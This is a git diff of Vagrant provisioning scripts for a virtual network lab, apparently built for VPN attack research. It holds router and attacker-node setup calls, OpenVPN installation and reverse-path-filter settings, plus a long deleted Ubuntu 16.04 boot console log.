../routers/gateway +./copy_attacker_setup.sh + + +ssh -p 22117 -i .vagrant/machines/default/virtualbox/private_key vagrant@localhost ./setup_attacker.sh + diff --git a/virtual-test-environment/configs/setup_servside_env.sh b/virtual-test-environment/configs/setup_servside_env.sh new file mode 100755 index 0000000..f2e02ec --- /dev/null +++ b/virtual-test-environment/configs/setup_servside_env.sh @@ -0,0 +1,24 @@ +#!/bin/bash +# + +printf "\nConfiguring router1 attacker node..\n\n" + +sleep 1 + + +cd ../routers/router1 +./copy_attacker_setup.sh + + +ssh -p 22114 -i .vagrant/machines/default/virtualbox/private_key vagrant@localhost ./setup_attacker.sh + + +cd ../../edgers/web-server +./copy_dns_setup.sh + +ssh -p 22113 -i .vagrant/machines/default/virtualbox/private_key vagrant@localhost ./install_docker.sh + +#ssh -p 22113 -i .vagrant/machines/default/virtualbox/private_key vagrant@localhost ./start_dns.sh + + + diff --git a/virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index 6e06274..0000000 --- a/virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/edgers/client \ No newline at end of file diff --git a/virtual-test-environment/edgers/client/Vagrantfile b/virtual-test-environment/edgers/client/Vagrantfile index 1a1f303..dbe7618 100644 --- a/virtual-test-environment/edgers/client/Vagrantfile +++ b/virtual-test-environment/edgers/client/Vagrantfile @@ -16,5 +16,9 @@ Vagrant.configure(2) do |config| end config.vm.provision :shell, path: "setup_net.sh" - + + config.vm.provision "shell", inline: <<-SHELL + sudo apt-get update + sudo apt-get install -y openvpn + SHELL end diff --git a/virtual-test-environment/edgers/client/copy_client_config.sh b/virtual-test-environment/edgers/client/copy_client_config.sh index 3372568..0f64a56 100755 --- a/virtual-test-environment/edgers/client/copy_client_config.sh +++ b/virtual-test-environment/edgers/client/copy_client_config.sh @@ -4,7 +4,7 @@ cd ../vpn-server/ echo "Copying client1 config file from vpn server vm.." -scp -i .vagrant/machines/default/virtualbox/private_key -P 22112 vagrant@localhost:~/client-configs/files/client1* . +scp -i .vagrant/machines/default/virtualbox/private_key -P 22119 vagrant@localhost:~/client-configs/files/client1* . mv -v client1* ../client diff --git a/virtual-test-environment/edgers/client/setup_net.sh b/virtual-test-environment/edgers/client/setup_net.sh index ce6d844..bdc87de 100755 --- a/virtual-test-environment/edgers/client/setup_net.sh +++ b/virtual-test-environment/edgers/client/setup_net.sh @@ -11,4 +11,16 @@ hostname $HNAME sed -i "s/#VAGRANT-END/up route add -net 172.16.0.0\/16 gw 172.16.4.254 dev enp0s8\nup route add -net 192.168.0.0\/16 gw 172.16.4.254 dev enp0s8/g" /etc/network/interfaces #/etc/init.d/networking restart + + + + +echo "net.ipv4.conf.all.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.default.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.lo.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s8.rp_filter=0" >> /etc/sysctl.conf + +sysctl -p + + exit diff --git a/virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index 5be4f38..0000000 --- a/virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,650 +0,0 @@ -[ 0.000000] Initializing cgroup subsys cpuset -[ 0.000000] Initializing cgroup subsys cpu -[ 0.000000] Initializing cgroup subsys cpuacct -[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-geeric 4.4.233) -[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-gneric root=LABEL=cloudimgrootfs ro console=tty1 console=ttyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GenuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'stadard' format. -[ 0.000000] e820: BIOS-provided physical RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable -[ 0.000000] BIO-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable -[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hypervisor detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.000000] MTRR: Disabled -[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas forlow memory corruption -[ 0.000000] RAMDISK: [mem 0x362e000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disabled -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) -[ 0.000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] -[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b54d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock -[ 0.000000] kvm-clock: using sched offset of 4082191642 cycles -[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns -[ 0.000000] Zone ranges: -[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] -[ 0.000000] Normal empty -[ 0.000000] Device empty -[ 0.000000] Movable zone start for each node -[ 0.000000] Early memory node ranges -[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 -[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bu_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] -[ 0.0000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fff] -[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices -[ 0.000000] Booting paravirtualized kernel on KVM -[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns -[ 0.000000] setup_percpu: NR_CPU:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 -[ 0.000000] Polcy zoe: DMA32 -[ 0.00000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PID hash table entres: 4096 (order: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.000000] Kernel/User pa tables isolation: enabled -[ 0.000000] Hierarchical RCU implementation. -[ 0.000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanut_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.000000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 1.041791] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 1.052454] pid_max: default: 32768 minimum: 301 -[ 1.053996] ACPI: Core revision 20150930 -[ 1.091681] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 1.134566] Security Framework initialized -[ 1.141633] Yama: becoming mindful. -[ 1.143203] AppArmor: AppArmor initialized -[ 1.145048] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 1.151090] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 1.155809] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.164580] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.172192] Initializing cgroup subsys io -[ 1.183941] Initializing cgroup subsys memory -[ 1.187985] Initializing cgroup subsys devices -[ 1.189126] Initializing cgroup subsys freezer -[ 1.191162] Initializing cgroup subsys net_cls -[ 1.200382] Initializing cgroup subsys perf_event -[ 1.207094] Initializing cgroup subsys net_prio -[ 1.225711] Initializing cgroup subsys hugetlb -[ 1.234444] Initializing cgroup subsys pids -[ 1.267429] mce: CPU supports 0 MCE banks -[ 1.277762] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 1.294662] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 1.299689] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 1.303783] Spectre V2 : Mitigation: Full generic retpoline -[ 1.306772] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 1.313338] Speculative Store Bypass: Vulnerable -[ 1.323442] SRBDS: Unknown: Dependent on hypervisor status -[ 1.327384] MDS: Mitigation: Clear CPU buffers -[ 1.341396] Freeing SMP alternatives memory: 36K -[ 1.373736] ftrace: allocating 32339 entries in 127 pages -[ 1.570892] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 1.577500] smpboot: Max logical packages: 1 -[ 1.578775] x2apic enabled -[ 1.584448] Switched APIC routing to physical x2apic. -[ 1.611479] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 1.721452] APIC calibration not consistent with PM-Timer: 98ms instead of 100ms -[ 1.752323] APIC delta adjusted to PM-Timer: 6249636 (6166268) -[ 1.766711] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 1.779907] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 1.823978] KVM setup paravirtual spinlock -[ 1.844532] x86: Booting SMP configuration: -[ 1.846154] .... node #0, CPUs: #1 -[ 1.855087] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 1.906425] mce: CPU supports 0 MCE banks -[ 1.913784] x86: Booted up 1 node, 2 CPUs -[ 1.923654] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 1.932016] devtmpfs: initialized -[ 1.948865] evm: security.selinux -[ 1.959303] evm: security.SMACK64 -[ 1.961627] evm: security.SMACK64EXEC -[ 1.962388] evm: security.SMACK64TRANSMUTE -[ 1.986831] evm: security.SMACK64MMAP -[ 1.999663] evm: security.ima -[ 2.000776] evm: security.capability -[ 2.015490] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 2.019114] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 2.020986] pinctrl core: initialized pinctrl subsystem -[ 2.043244] RTC time: 22:38:15, date: 01/25/21 -[ 2.051212] NET: Registered protocol family 16 -[ 2.079301] cpuidle: using governor ladder -[ 2.091373] cpuidle: using governor menu -[ 2.109133] PCCT header not found. -[ 2.116628] ACPI: bus type PCI registered -[ 2.132780] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 2.145019] PCI: Using configuration type 1 for base access -[ 2.171956] ACPI: Added _OSI(Module Device) -[ 2.180922] ACPI: Added _OSI(Processor Device) -[ 2.205096] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 2.212773] ACPI: Added _OSI(Processor Aggregator Device) -[ 2.253682] ACPI: Executed 1 blocks of module-level executable AML code -[ 2.294982] ACPI: Interpreter enabled -[ 2.304830] ACPI: (supports S0 S5) -[ 2.324785] ACPI: Using IOAPIC for interrupt routing -[ 2.327228] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 2.353177] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 2.365063] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 2.390076] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 2.400220] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 2.409635] PCI host bridge to bus 0000:00 -[ 2.413298] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 2.416237] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 2.427435] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 2.464047] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 2.484616] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 2.537475] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 2.543409] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 2.569429] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 2.582226] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 2.612300] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 2.614098] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 2.647067] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 2.682353] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 2.689977] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 2.724348] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 2.748998] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 2.752768] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 2.755682] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 2.783660] vgaarb: loaded -[ 2.808670] vgaarb: bridge control possible 0000:00:02.0 -[ 2.811991] SCSI subsystem initialized -[ 2.823706] ACPI: bus type USB registered -[ 2.826389] usbcore: registered new interface driver usbfs -[ 2.829131] usbcore: registered new interface driver hub -[ 2.848781] usbcore: registered new device driver usb -[ 2.855831] PCI: Using ACPI for IRQ routing -[ 2.859935] NetLabel: Initializing -[ 2.861112] NetLabel: domain hash size = 128 -[ 2.882446] NetLabel: protocols = UNLABELED CIPSOv4 -[ 2.899911] NetLabel: unlabeled traffic allowed by default -[ 2.901551] amd_nb: Cannot enumerate AMD northbridges -[ 2.903022] clocksource: Switched to clocksource kvm-clock -[ 2.924924] AppArmor: AppArmor Filesystem Enabled -[ 2.926027] pnp: PnP ACPI init -[ 2.929410] pnp: PnP ACPI: found 3 devices -[ 2.948338] clocksource: acpi_pm: mask: 0ffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns -[ 3.095853] NET: Registered protocol family 2 -[ 3.102833] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 3.107417] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) -[ 3.123126] TCP: Hash tables configured (established 8192 bind 8192) -[ 3.134673] UDP hash table entries: 512 (order: 2, 16384bytes) -[ 3.205327] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) -[ 3.207915] NET: Registerd protocol family 1 -[ 3.297769] pci 0000:0:00.0: Limiting direct PCI/PCI transfers -[ 3.396647] pci 0000:00:01.0: Activating ISA DMA hang workarounds -[ 3.471672] Unpacking initramfs... - -[ 3.970575] Freeing initrd memory: 14880K -[ 3.984183] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 3.992274] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 3.995566] Scanning for low memory corruption every 60 seconds -[ 4.011033] audit: initializing netlink subsys (disabled) -[ 4.013138] audit: type=2000 audit(1611614300.723:1): initialized -[ 4.015868] Initialise system trusted keyring -[ 4.019301] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 4.023298] zbud: loaded -[ 4.029526] VFS: Disk quotas dquot_6.6.0 -[ 4.032786] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 4.035391] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 4.042630] fusenit (API version 7.23) - -[ 4.092170] Key type big_key registered -[ 4.093044] Allocating IMA MOK and blacklist keyrings. -[ 4.105668] Key type asymmetric registered -[ 4.106543] Asymmetric key parser 'x509' registered -[ 4.107551] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 4.109133] io scheduler noop registered -[ 4.109944] io scheduler deadline registered (default) -[ 4.111048] io scheduler cfq registered -[ 4.111922] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 4.112997] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 4.114299] ACPI: AC Adapter [AC] (on-line) -[ 4.115278] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 4.116958] ACPI: Power Button [PWRF] -[ 4.117833] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 4.119481] ACPI: Sleep Button [SLPF] -[ 4.133847] GHES: HEST is not enabled! -[ 4.134520] ACPI: Battery Slot [BAT0] (battery present) -[ 4.136999] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 4.165823] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ 4.170212] Linux agpgart interface v0.103 -[ 4.181326] loop: module loaded -[ 4.184276] scsi host0: ata_piix -[ 4.185208] scsi host1: ata_piix -[ 4.185962] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 1 - -[ 4.21420 ata PATAax UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 - -[ 4.371327] libphy: Fixed MDIO Bus: probed -[ 4.379093] tun: Universal TUN/TAP device driver, 1.6 -[ 4.388011] tun: (C) 1999-2004 Max Krasnyansky -[ 4.391183] PPP generic driver version 2.4.2 -[ 4.426128] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 4.468388] ehci-pci: EHCI PCI platform driver -[ 4.469378] ehci-platform: EHCI generic platform driver -[ 4.470444] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 4.485015] ohci-pci: OHCI PCI platform driver -[ 4.486130] ohci-platform: OHCI generic platform driver -[ 4.503008] uhci_hcd: USB Universal Host Controller Interface driver -[ 4.504486] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 4.511206] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 4.513002] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 4.515083] mousedev: PS/2 mouse device common for all mice -[ 4.524484] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 4.526761] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 4.529286] i2c /dev entries driver -[ 4.530851] device-mapper: uevent: version 1.0.3 -[ 4.533079] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 4.536683] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 4.540261] ledtrig-cpu: registered to indicate activity on CPUs -[ 4.549094] NET: Registered protocol family 10 -[ 4.552582] NET: Registered protocol family 17 -[ 4.554293] Key type dns_resolver registered -[ 4.556680] registered taskstats version 1 -[ 4.560041] Loading compiled-in X.509 certificates -[ 4.563348] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 4.576400] zswap: loaded using pool lzo/zbud -[ 4.590129] Key type trusted registered -[ 4.612729] Key type encrypted registered -[ 4.622125] AppArmor: AppArmor sha1 policy hashing enabled -[ 4.623722] ima: No TPM chip found, activating TPM-bypass! -[ 4.624935] ima: Allocated hash algorithm: sha1 -[ 4.625962] evm: HMAC attrs: 0x1 -[ 4.633605] Magic number: 5:763:654 -[ 4.635183] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:17 UTC (1611614297) -[ 4.650532] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 4.651956] EDD information not available. -[ 4.657952] Freeing unused kernel memory: 1492K -[ 4.675194] Write protecting the kernel read-only data: 14336k -[ 4.680037] Freeing unused kernel memory: 1592K -[ 4.915093] Freeing unused kernel memory: 56K -Loading, please [ 4.930592] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -wait... -starting version 229 -[ 4.932410] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.932440] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.962890] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.962953] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.963123] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.963190] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.963255] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.963321] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.963383] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.222068] Fusion MPT base driver 3.04.20 -[ 5.253499] Copyright (c) 1999-2008 LSI Corporation -[ 5.305227] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 5.306739] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 5.312221] Fusion MPT SPI Host driver 3.04.20 -[ 5.353626] AVX2 version of gcm_enc/dec engaged. -[ 5.373129] AES CTR mode by8 optimization enabled -[ 5.542642] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 5.726480] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 5.800149] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 6.171083] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:61:0b:02 -[ 6.201230] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 6.223638] mptbase: ioc0: Initiating bringup -[ 6.241009] e1000 0000:00:03.0 enp0s3: renamed from eth0 -[ 6.267244] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 6.303237] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 6.520098] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 6.849681] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.913779] scsi target2:0:0: Beginning Domain Validation -[ 6.919912] scsi target2:0:0: Domain Validation skipping write tests -[ 6.922770] scsi target2:0:0: Ending Domain Validation -[ 6.936603] scsi target2:0:0: asynchronous -[ 6.951595] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.972824] scsi target2:0:1: Beginning Domain Validation -[ 6.979364] scsi target2:0:1: Domain Validation skipping write tests -[ 6.983056] scsi target2:0:1: Ending Domain Validation -[ 6.986256] scsi target2:0:1: asynchronous -[ 7.011309] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 7.015149] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 7.018770] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 7.025220] sd 2:0:0:0: [sda] Write Protect is off -[ 7.028055] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 7.031686] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 7.034018] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 7.037012] sd 2:0:1:0: [sdb] Write Protect is off -[ 7.040906] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 7.044586] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 7.054905] sda: sda1 -[ 7.057440] sd 2:0:0:0: [sda] Attached SCSI disk -[ 7.061141] sd 2:0:1:0: [sdb] Attached SCSI disk -Begin: Loading essential drivers ... [ 8.786645] md: linear personality registered for level -1 -[ 8.809845] md: multipath personality registered for level -4 -[ 8.856467] md: raid0 personality registered for level 0 -[ 8.894380] md: raid1 personality registered for level 1 -[ 9.035321] raid6: sse2x1 gen() 2850 MB/s -[ 9.103172] raid6: sse2x1 xor() 5213 MB/s -[ 9.171370] raid6: sse2x2 gen() 7439 MB/s -[ 9.244231] raid6: sse2x2 xor() 3720 MB/s -[ 9.330301] raid6: sse2x4 gen() 9858 MB/s -[ 9.411039] raid6: sse2x4 xor() 5637 MB/s -[ 9.479084] raid6: avx2x1 gen() 5819 MB/s -[ 9.564087] raid6: avx2x2 gen() 8858 MB/s -[ 9.651114] raid6: avx2x4 gen() 9868 MB/s -[ 9.652377] raid6: using algorithm avx2x4 gen() 9868 MB/s -[ 9.653550] raid6: using avx2x2 recovery algorithm -[ 9.698696] xor: automatically using best checksumming function: -[ 9.798989] avx : 26200.000 MB/sec -[ 9.808512] async_tx: api initialized (async) -[ 9.888917] md: raid6 personality registered for level 6 -[ 9.892220] md: raid5 personality registered for level 5 -[ 9.895892] md: raid4 personality registered for level 4 -[ 9.990793] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 10.103815] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file[ 10.223378] EXT4-fs (sda1): INFO: recovery required on readonly filesystem - system -[ 10.233665] EXT4-fs (sda1): write access will be enabled during recovery -[ 10.388937] EXT4-fs (sda1): recovery complete -[ 10.392064] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 11.109800] systemd[1]system229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APRMOR+SACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) - -[ 11.460244] systemd[1]: Detected virtualization oracle. -[ 11.461401] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 11.482881] 